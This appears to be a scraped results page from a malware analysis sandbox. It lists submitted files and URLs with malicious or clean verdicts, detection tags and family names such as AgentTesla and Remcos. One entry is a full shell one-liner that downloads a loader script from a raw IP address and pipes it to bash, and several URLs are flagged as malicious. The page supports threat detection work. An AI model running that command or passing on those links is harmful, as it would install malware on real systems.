top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
https://tibusiness.cl/css/causarol.rar
2024-04-24 07:34:38 +02:00
Info
no
Graph
Clean
https://r20.rs6.net/tn.jsp?f=0010gdwZK1zsOsjQXb-NAukJySfgXZyz_K3wcrtWdl2c9a0M2KwjR32yV-GeMGFctnLGHo0GtQqLsZebrpcjBBULA9LMqt3w49x9wkoDyiMBjklNW7pZwYa6OeeIr-PNeI4bgnrTAwRul3N-k6n9hiG6bmsBpkGnWt8Gw_FE34bso9t1M0xU8FlqrRDD68kdxoheDaQHY3vX0pawfZuw1D9OWVNFz9h-FGlYBaAJHtPvL2dUahcqWyjoAFYZbQzE8Ju&c=CDP-xJS150Z3ymCYoLtVfB94X14h3tr41f-WpvECDOmVDOiSMB8rSA==&ch=7fTjmLIMiDfz6AP3b7f4xde6-aYiS2qARZHxH1qoKYKTXexZGWNlng==
2024-04-24 07:30:51 +02:00
Info
Malicious
http://damarltda.cl/certificado.php
2024-04-24 07:24:48 +02:00
No classification & info
no
Graph
Clean
aMail_Ver1.exe
2024-04-24 07:23:38 +02:00
Info
Malicious
  • Yara
  • Snort
FormBook, PureLog Stealer
AV: 35%
shipping document.exe
2024-04-24 07:13:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
powershell.ps1
2024-04-24 07:00:13 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
Remcos
AV: 87%
1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe
2024-04-24 06:57:13 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
Remcos, DBatLoader
AV: 83%
fu56fbrtn8.exe
2024-04-24 06:57:13 +02:00
Info
Class
Malicious
no Icon
echo linux&(curl http://92.60.39.76:9991/ldr.sh||wget -q -O- http://92.60.39.76:9991/ldr.sh||cc http://92.60.39.76:9991/ldr.sh||ww -q -O- http://92.60.39.76:9991/ldr.sh)|bash
2024-04-24 06:51:27 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla, PureLog Stealer, RedLine
AV: 47%
FİYAT TEKLİF.exe
2024-04-24 06:48:21 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla, PureLog Stealer, RedLine
AV: 53%
62402781, Fiyat Teklif Talebi.pdf.exe
2024-04-24 06:48:21 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 41%
Dhl Express Shipping Docs .pdf.exe
2024-04-24 06:48:16 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 14%
New DHL Shipment Document Arrival Notice.pdf.exe
2024-04-24 06:48:16 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 63%
DHL_1003671162.exe
2024-04-24 06:48:16 +02:00
Info
Class
Malicious
  • Sigma
  • Snort
VjW0rm
AV: 21%
PROFOMA INVOICE.js
2024-04-24 06:47:25 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
AV: 63%
xF3wienia PO2102559-1.xlsx
2024-04-24 06:47:25 +02:00
Info
Class
Malicious
  • Yara
AgentTesla
AV: 43%
r)_78768.exe
2024-04-24 06:47:22 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
GuLoader, Remcos
AV: 42%
СПЦ №130 от 12.04.2024 подпис..exe
2024-04-24 06:47:20 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 53%
hesaphareketi_1.scr.exe
2024-04-24 06:47:20 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 16%
dekont_20240423_388993774837743.exe
2024-04-24 06:47:17 +02:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column